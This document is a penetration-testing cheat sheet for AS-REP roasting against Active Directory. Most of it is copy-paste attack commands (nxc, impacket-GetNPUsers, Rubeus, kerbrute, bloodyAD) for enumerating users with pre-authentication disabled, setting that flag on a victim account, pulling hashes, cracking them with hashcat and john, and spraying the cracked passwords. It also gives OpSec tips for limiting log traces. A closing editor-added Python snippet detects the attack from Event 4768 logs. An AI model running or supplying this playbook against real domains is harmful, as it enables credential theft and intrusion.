AS-REP Roasting
Request a TGT for any user with DONT_REQ_PREAUTH set (Kerberos pre-authentication not required). Part of the AS-REP is encrypted with a key derived from the user's password (the NT hash when RC4 is used), so it can be cracked offline.
DC=10.10.11.50
DOMAIN=corp.local
USER='svc_user'
PASS='Password1'
NTHASH='<nt-hash>'   # placeholder; only needed for the -H / -hashes variants below
i. Find AS-REP roastable users
UAC flag is DONT_REQ_PREAUTH (bit 4194304 / 0x400000).
BloodHound:
MATCH (u:User {dontreqpreauth: true, enabled: true}) RETURN u.name
bloodyAD filter:
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get search \
--filter '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' \
--attr samaccountname
nxc enumerates and pulls hashes in one call (see next section).
ii. With creds, roast everything
nxc pulls every no-preauth user automatically:
nxc ldap $DC -u $USER -p $PASS --asreproast asrep.txt
nxc ldap $DC -u $USER -H $NTHASH --asreproast asrep.txt
## When DNS is funky:
nxc ldap $DC -u $USER -p $PASS --asreproast asrep.txt --kdcHost $DOMAIN
impacket-GetNPUsers:
impacket-GetNPUsers -dc-ip $DC -request "$DOMAIN/" -usersfile users.txt -format hashcat -outputfile asrep.txt
## With creds (no usersfile needed, enumerates from LDAP):
impacket-GetNPUsers -dc-ip $DC -request "$DOMAIN/$USER:$PASS" -format hashcat -outputfile asrep.txt
impacket-GetNPUsers -dc-ip $DC -request -hashes :$NTHASH "$DOMAIN/$USER" -format hashcat -outputfile asrep.txt
Rubeus from Windows:
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
Rubeus.exe asreproast /user:victim /format:hashcat /outfile:asrep.txt
iii. Without creds, just a user list
This is why AS-REP roasting is special: you don’t need a valid credential, just a username to test. kerbrute + nxc combo:
## 1. Enumerate valid usernames
kerbrute userenum -d $DOMAIN --dc $DC /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -o users.valid
## 2. nxc with empty password against the user list
nxc ldap $DC -u users.valid -p '' --asreproast asrep-anon.txt
Or impacket directly with a username list and no creds:
impacket-GetNPUsers -dc-ip $DC -no-pass -usersfile users.valid -format hashcat -outputfile asrep.txt
Even when you don’t know whether any users are no-preauth, run nxc ldap $DC -u users.valid -p '' --asreproast anyway: an empty hash file means nothing to roast, valid hashes mean free creds.
iv. Targeted AS-REP (set DONT_REQ_PREAUTH yourself)
When you have GenericWrite (or any UAC-write right) on a user, flip the flag, roast, flip it back. bloodyAD makes this clean:
## 1. Add the flag
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC add uac victim -f DONT_REQ_PREAUTH
## 2. Roast the now-vulnerable user
impacket-GetNPUsers -dc-ip $DC -no-pass -usersfile <(echo victim) -format hashcat -outputfile asrep.txt
## or nxc:
nxc ldap $DC -u victim -p '' --asreproast asrep.txt
## 3. Remove the flag to restore the original UAC value (the change itself is still auditable, see OpSec on 5136)
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC remove uac victim -f DONT_REQ_PREAUTH
This is the cleanest “I have GenericWrite on someone” -> “I have their hash” chain. Often easier than targeted kerberoast because it doesn’t require the user to have an SPN attribute.
v. Cracking the hash
Format is $krb5asrep$23$user@DOMAIN:checksum$ciphertext.
Hashcat:
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 18200 asrep.txt rockyou.txt -r OneRuleToRuleThemAll.rule
John:
john --format=krb5asrep --wordlist=rockyou.txt asrep.txt
AS-REP hashes use RC4 (etype 23) by default for the encrypted portion, so cracking speed is comparable to kerberoasting RC4 (much faster than AES TGS). If RC4 is disabled on the DC you get AES etypes 17/18 instead (hashcat modes 32100/32200), which crack far slower.
vi. After cracking, what to do
The cracked credential belongs to the no-preauth user. Service accounts and shared accounts are often flagged DONT_REQ_PREAUTH because the admin couldn’t get Kerberos pre-auth to work and disabled it. Spray it everywhere:
nxc smb $DC -u victim -p 'Cracked123!' --shares
nxc winrm $DC -u victim -p 'Cracked123!'
nxc ldap $DC -u victim -p 'Cracked123!' --users
Then re-collect BloodHound to see what edges open up from the newly-owned user.
vii. Why AS-REP roasting is everywhere
- Old smartcard / multi-domain setups disable pre-auth for compatibility
- Some legacy apps fail with pre-auth enabled, admins disable it as a quick fix
- Auto-provisioning scripts sometimes set the flag during user creation and never unset it
- DONT_REQ_PREAUTH is rarely audited because it doesn’t generate normal logs
On a real engagement, even one no-preauth account in a domain of 10,000 users is often enough to start the chain.
viii. OpSec
- Each AS-REP request logs as Event 4768 on the DC (TGT requested)
- Empty-password binds for asreproast don’t log as 4625 (failed auth), they just look like AS_REQs
- Targeted ASREP via UAC flip leaves an audit trail in 5136 (directory object modified) if AD auditing is enabled
- Always remove the flag immediately after roasting (section iv)
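On the detection side of the 4768 point above, here is a small Python check added by the editor (not part of the original notes) that runs over constructed, simplified 4768 lines: it keys on Pre-Authentication Type 0 (no pre-auth performed) plus Ticket Encryption Type 0x17 (RC4), and then looks for one client address pulling such TGTs for several distinct accounts, which is the roasting signature rather than a lone legacy app. The one-field-per-line layout and the threshold of two accounts are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed, simplified 4768 records (one event per line, not a real export).
# Field names mirror the Windows Security log: Pre-Authentication Type 0 = no
# pre-auth was performed; Ticket Encryption Type 0x17 = RC4-HMAC (etype 23),
# 0x12 = AES256.
SAMPLE_4768 = [
    "Account Name: svc_backup | Ticket Encryption Type: 0x17 | Pre-Authentication Type: 0 | Client Address: ::ffff:10.10.14.7",
    "Account Name: jsmith | Ticket Encryption Type: 0x12 | Pre-Authentication Type: 2 | Client Address: ::ffff:10.10.11.23",
    "Account Name: svc_legacy | Ticket Encryption Type: 0x17 | Pre-Authentication Type: 0 | Client Address: ::ffff:10.10.14.7",
    "Account Name: DC01$ | Ticket Encryption Type: 0x12 | Pre-Authentication Type: 2 | Client Address: ::ffff:10.10.11.50",
    "Account Name: app_old | Ticket Encryption Type: 0x17 | Pre-Authentication Type: 0 | Client Address: ::ffff:10.10.11.60",
]

FIELD_RE = re.compile(
    r"Account Name: (?P<user>[^|]+?) \| Ticket Encryption Type: (?P<etype>0x[0-9a-fA-F]+)"
    r" \| Pre-Authentication Type: (?P<preauth>\d+) \| Client Address: (?P<client>\S+)"
)

def parse_4768(line):
    """Return the fields we key on as a dict, or None if the line does not match."""
    m = FIELD_RE.search(line)
    if not m:
        return None
    return {
        "user": m["user"],
        "etype": int(m["etype"], 16),
        "preauth": int(m["preauth"]),
        "client": m["client"],
    }

def is_asrep_candidate(ev):
    """A TGT issued with no pre-authentication is exactly what AS-REP roasting
    harvests; RC4 on top of that is the tool default and is cheap to crack."""
    return ev["preauth"] == 0 and ev["etype"] == 0x17

def flag_asrep_events(lines):
    """Return (user, client) for every event that looks like an AS-REP capture."""
    events = (parse_4768(line) for line in lines)
    return [(ev["user"], ev["client"]) for ev in events if ev and is_asrep_candidate(ev)]

def clients_roasting_many(lines, min_users=2):
    """One client pulling no-preauth TGTs for several distinct accounts is the
    roasting signature; a single no-preauth account seen from its usual host
    may just be a legacy app. Returns {client: sorted users} above threshold."""
    seen = defaultdict(set)
    for user, client in flag_asrep_events(lines):
        seen[client].add(user)
    return {c: sorted(u) for c, u in seen.items() if len(u) >= min_users}
```

The single hit from 10.10.11.60 is deliberately left below the threshold: that account still belongs on the remediation list (clear DONT_REQ_PREAUTH, or at least disable RC4 for it), but it is not by itself evidence of roasting.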